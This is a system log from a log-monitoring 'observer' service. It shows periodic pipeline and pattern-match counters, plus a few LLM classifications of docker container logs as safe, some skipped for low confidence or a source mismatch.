Mar 20 01:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:31.935975 [observer] Pipeline: processed=656 pattern_hits=645 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:31.936003 [observer] Patterns: hash=645 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:01.956814 [observer] Pipeline: processed=660 pattern_hits=649 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:01.956851 [observer] Patterns: hash=649 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:31.944208 [observer] Pipeline: processed=662 pattern_hits=651 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:31.944230 [observer] Patterns: hash=651 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:01.955725 [observer] Pipeline: processed=664 pattern_hits=653 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:01.955755 [observer] Patterns: hash=653 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:31.933545 [observer] Pipeline: processed=668 pattern_hits=657 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:31.933569 [observer] Patterns: hash=657 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:01.957858 [observer] Pipeline: processed=670 pattern_hits=659 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:01.957886 [observer] Patterns: hash=659 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:31.933722 [observer] Pipeline: processed=674 pattern_hits=663 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:31.933750 [observer] Patterns: hash=663 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:01.946786 [observer] Pipeline: processed=676 pattern_hits=665 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:01.946845 [observer] Patterns: hash=665 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:31.933692 [observer] Pipeline: processed=680 pattern_hits=669 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:31.933716 [observer] Patterns: hash=669 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:01.962772 [observer] Pipeline: processed=682 pattern_hits=671 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:01.962803 [observer] Patterns: hash=671 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:31.934775 [observer] Pipeline: processed=686 pattern_hits=675 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:31.934800 [observer] Patterns: hash=675 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:01.940094 [observer] Pipeline: processed=690 pattern_hits=679 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:01.940119 [observer] Patterns: hash=679 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:31.944391 [observer] Pipeline: processed=692 pattern_hits=681 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:31.944421 [observer] Patterns: hash=681 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:06:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:02.084354 [observer] Pipeline: processed=696 pattern_hits=685 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:06:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:02.084388 [observer] Patterns: hash=685 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:31.944050 [observer] Pipeline: processed=698 pattern_hits=687 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:31.944091 [observer] Patterns: hash=687 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.130949 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.130988 [analyzer] Source hint mismatch: LLM says "nginx_access_log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.142112 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.142153 [analyzer] Confidence 0.80 too low for pattern learning (need 0.85+)
Mar 20 02:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:01.950572 [observer] Pipeline: processed=704 pattern_hits=691 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:01.950692 [observer] Patterns: hash=691 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:31.937602 [observer] Pipeline: processed=706 pattern_hits=693 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:31.937627 [observer] Patterns: hash=693 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:01.952199 [observer] Pipeline: processed=708 pattern_hits=695 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:01.952283 [observer] Patterns: hash=695 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:31.933793 [observer] Pipeline: processed=712 pattern_hits=699 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:31.933818 [observer] Patterns: hash=699 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:01.955302 [observer] Pipeline: processed=714 pattern_hits=701 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:01.955331 [observer] Patterns: hash=701 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:31.933645 [observer] Pipeline: processed=720 pattern_hits=707 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:31.933669 [observer] Patterns: hash=707 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:01.948685 [observer] Pipeline: processed=722 pattern_hits=709 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:01.948718 [observer] Patterns: hash=709 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:31.933647 [observer] Pipeline: processed=726 pattern_hits=713 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:31.933672 [observer] Patterns: hash=713 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:01.951479 [observer] Pipeline: processed=728 pattern_hits=715 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:01.951507 [observer] Patterns: hash=715 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:31.949612 [observer] Pipeline: processed=730 pattern_hits=717 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:31.949635 [observer] Patterns: hash=717 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:01.937854 [observer] Pipeline: processed=734 pattern_hits=721 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:01.937881 [observer] Patterns: hash=721 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:31.949666 [observer] Pipeline: processed=736 pattern_hits=723 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:31.949695 [observer] Patterns: hash=723 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:01.939907 [observer] Pipeline: processed=740 pattern_hits=727 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:01.939937 [observer] Patterns: hash=727 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:31.941676 [observer] Pipeline: processed=742 pattern_hits=729 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:31.942570 [observer] Patterns: hash=729 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:01.948316 [observer] Pipeline: processed=746 pattern_hits=733 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:01.948344 [observer] Patterns: hash=733 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:31.934828 [observer] Pipeline: processed=750 pattern_hits=737 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:31.934856 [observer] Patterns: hash=737 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:01.951533 [observer] Pipeline: processed=752 pattern_hits=739 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:01.951561 [observer] Patterns: hash=739 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:31.939633 [observer] Pipeline: processed=756 pattern_hits=743 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:31.939659 [observer] Patterns: hash=743 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:01.980242 [observer] Pipeline: processed=758 pattern_hits=745 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:01.980275 [observer] Patterns: hash=745 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:31.934012 [observer] Pipeline: processed=762 pattern_hits=749 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:31.934034 [observer] Patterns: hash=749 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:01.952722 [observer] Pipeline: processed=764 pattern_hits=751 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:01.952753 [observer] Patterns: hash=751 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:31.933719 [observer] Pipeline: processed=768 pattern_hits=755 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:31.933743 [observer] Patterns: hash=755 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:01.955693 [observer] Pipeline: processed=770 pattern_hits=757 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:01.955750 [observer] Patterns: hash=757 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:31.951542 [observer] Pipeline: processed=772 pattern_hits=759 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:31.951568 [observer] Patterns: hash=759 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:01.948112 [observer] Pipeline: processed=776 pattern_hits=763 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:01.948536 [observer] Patterns: hash=763 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:31.933463 [observer] Pipeline: processed=778 pattern_hits=765 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:31.933485 [observer] Patterns: hash=765 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:01.941688 [observer] Pipeline: processed=784 pattern_hits=771 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:01.941715 [observer] Patterns: hash=771 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:31.935364 [observer] Pipeline: processed=786 pattern_hits=773 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:31.935387 [observer] Patterns: hash=773 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:01.944286 [observer] Pipeline: processed=790 pattern_hits=777 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:01.944442 [observer] Patterns: hash=777 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:31.934722 [observer] Pipeline: processed=792 pattern_hits=779 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:31.934746 [observer] Patterns: hash=779 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:01.954710 [observer] Pipeline: processed=794 pattern_hits=781 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:01.954736 [observer] Patterns: hash=781 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:31.934539 [observer] Pipeline: processed=798 pattern_hits=785 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:31.934570 [observer] Patterns: hash=785 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:01.950475 [observer] Pipeline: processed=800 pattern_hits=787 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:01.950508 [observer] Patterns: hash=787 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:31.933747 [observer] Pipeline: processed=804 pattern_hits=791 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:31.933771 [observer] Patterns: hash=791 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:24:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:02.101779 [observer] Pipeline: processed=806 pattern_hits=793 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:24:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:02.101822 [observer] Patterns: hash=793 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:31.933722 [observer] Pipeline: processed=810 pattern_hits=797 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:31.933745 [observer] Patterns: hash=797 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:01.942984 [observer] Pipeline: processed=814 pattern_hits=801 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:01.943018 [observer] Patterns: hash=801 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:31.950832 [observer] Pipeline: processed=816 pattern_hits=803 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:31.950859 [observer] Patterns: hash=803 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:01.955023 [observer] Pipeline: processed=820 pattern_hits=807 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:01.955054 [observer] Patterns: hash=807 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:31.942881 [observer] Pipeline: processed=822 pattern_hits=809 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:31.942907 [observer] Patterns: hash=809 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:01.938759 [observer] Pipeline: processed=826 pattern_hits=813 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:01.938787 [observer] Patterns: hash=813 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:31.942106 [observer] Pipeline: processed=828 pattern_hits=815 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:31.942135 [observer] Patterns: hash=815 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:01.935880 [observer] Pipeline: processed=832 pattern_hits=819 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:01.935905 [observer] Patterns: hash=819 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:31.933559 [observer] Pipeline: processed=834 pattern_hits=821 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:31.933591 [observer] Patterns: hash=821 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:01.995887 [observer] Pipeline: processed=836 pattern_hits=823 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:01.995918 [observer] Patterns: hash=823 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:31.936328 [observer] Pipeline: processed=840 pattern_hits=827 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:31.936351 [observer] Patterns: hash=827 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:01.941908 [observer] Pipeline: processed=844 pattern_hits=831 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:01.941932 [observer] Patterns: hash=831 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:31.934827 [observer] Pipeline: processed=848 pattern_hits=835 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:31.934855 [observer] Patterns: hash=835 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:01.994625 [observer] Pipeline: processed=850 pattern_hits=837 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:01.994735 [observer] Patterns: hash=837 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:31.933709 [observer] Pipeline: processed=854 pattern_hits=841 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:31.933732 [observer] Patterns: hash=841 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:01.945832 [observer] Pipeline: processed=856 pattern_hits=843 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:01.945863 [observer] Patterns: hash=843 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:31.951293 [observer] Pipeline: processed=858 pattern_hits=845 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:31.951314 [observer] Patterns: hash=845 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:01.941556 [observer] Pipeline: processed=862 pattern_hits=849 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:01.941671 [observer] Patterns: hash=849 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:31.944201 [observer] Pipeline: processed=864 pattern_hits=851 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:31.944227 [observer] Patterns: hash=851 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:01.941469 [observer] Pipeline: processed=868 pattern_hits=855 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:01.941500 [observer] Patterns: hash=855 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:31.944143 [observer] Pipeline: processed=870 pattern_hits=857 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:31.944184 [observer] Patterns: hash=857 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:34:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:45.005032 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=regex
Mar 20 02:34:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:45.008110 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 02:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:54.975986 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 02:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:54.976021 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 02:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:59.903190 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 02:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:59.903227 [analyzer] Source hint mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern
Mar 20 02:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:01.945817 [observer] Pipeline: processed=879 pattern_hits=863 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:01.945851 [observer] Patterns: hash=863 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:31.941976 [observer] Pipeline: processed=881 pattern_hits=865 llm_calls=16 llm_errors=0 learned=0
